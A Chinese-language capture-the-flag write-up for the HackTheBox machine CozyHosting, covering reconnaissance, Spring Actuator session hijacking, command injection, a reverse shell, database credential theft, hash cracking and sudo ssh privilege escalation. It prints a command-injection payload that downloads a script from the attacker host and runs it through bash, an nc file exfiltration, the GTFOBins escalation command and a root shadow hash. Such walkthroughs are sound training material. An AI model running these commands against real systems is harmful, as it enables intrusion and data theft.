基本信息
- https://app.hackthebox.com/machines/CozyHosting
- 10.10.11.230
data:image/s3,"s3://crabby-images/4557f/4557f1d051dd813d8e052aa51d5d2bf744e1fd59" alt=""
端口扫描
22和80:
1 | nmap -sC -sV -Pn 10.10.11.230 |
80
需要加hosts:
1 | 10.10.11.230 cozyhosting.htb |
data:image/s3,"s3://crabby-images/91d51/91d51066bdd18d44b12a878e0754d1cb6a58d1f4" alt=""
Spring
随意输入,根据报错页面知道是spring:
data:image/s3,"s3://crabby-images/813fa/813fa61bb00fd649634be4b86678f157d0f5fecb" alt=""
actuator
很容易探测到actuator,burp开着apikit的话也直接自动出来了:
- Spring Actuators - HackTricks
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/spring-actuators - API-Security/APIKit: APIKit:Discovery, Scan and Audit APIs Toolkit All In One.
https://github.com/API-Security/APIKit
data:image/s3,"s3://crabby-images/90fc8/90fc835d28aab83f3ec73cfea649f8dd41c694e5" alt=""
sessions
sessions中得到一个有效session:
data:image/s3,"s3://crabby-images/d4b26/d4b262a5b55061674d695558ef351539a38aedf7" alt=""
Cozy Cloud
同样是前面api那里可以知道admin,使用得到的session可以访问admin:
data:image/s3,"s3://crabby-images/4d04e/4d04e68a6e7b942cc60433bc538c83741ca56134" alt=""
data:image/s3,"s3://crabby-images/9a0bb/9a0bb68b6f9ccf486e4526bb823ac502bcf1077e" alt=""
data:image/s3,"s3://crabby-images/c267b/c267b2cbbac6a11aad17fd88c47fcca105e4a81b" alt=""
executessh
connection setting那里看起来是使用指定的用户名通过ssh连接指定host:
data:image/s3,"s3://crabby-images/c7933/c7933ebae6e72226019caa5232a243c731fe6546" alt=""
命令注入
这种场景,测试存在命令注入,存在过滤例如不能出现空格,基础绕过:
data:image/s3,"s3://crabby-images/bbf1b/bbf1bc528b7af2c1c1b8880062a3774680cdd57e" alt=""
data:image/s3,"s3://crabby-images/2c1ce/2c1ceef859adf6561cbf8966a001809d48c1265b" alt=""
reverse shell
利用命令注入得到app shell:
1 | host=10.10.16.4&username=`curl${IFS}10.10.16.4:7777/shell|bash` |
data:image/s3,"s3://crabby-images/fa6c3/fa6c36ecf1f93494af50d2ad318206b9cc5e03a1" alt=""
cloudhosting
得到的app目录中有一个jar包,下载下来分析:
1 | app@cozyhosting:/app$ nc 10.10.16.4 4444 < cloudhosting-0.0.1.jar |
发现postgresql连接信息:
1 | spring.datasource.platform=postgres |
data:image/s3,"s3://crabby-images/946a4/946a40d2ec8ecdaa022f86f4d274efa48cb90936" alt=""
postgresql
连接postgresql,获取信息:
1 | psql -U postgres -W -h localhost |
得到的admin hash破解出密码:
1 | sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt |
user flag
得到的密码就是josh用户密码,ssh登录:
data:image/s3,"s3://crabby-images/a52ee/a52eed3abbf3d225a4c284134e12bcd072cebf76" alt=""
提权信息
sudo ssh,基础的gtfobins:
- ssh | GTFOBins
https://gtfobins.github.io/gtfobins/ssh/#sudo
提权 & root flag
直接根据gtfobins给出的命令:
1 | sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x |
data:image/s3,"s3://crabby-images/ed391/ed391223ad7ee9169d929096a5751c3219d1890e" alt=""
shadow
1 | root:$y$j9T$nK3A0N4wTEzopZkv8GQds0$NlR46AiiQOChoO1UNpiOYFIBHM7s956G8l8p/w15Sp2:19577:0:99999:7::: |
参考资料
- Spring Actuators - HackTricks
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/spring-actuators - API-Security/APIKit: APIKit:Discovery, Scan and Audit APIs Toolkit All In One.
https://github.com/API-Security/APIKit - ssh | GTFOBins
https://gtfobins.github.io/gtfobins/ssh/#sudo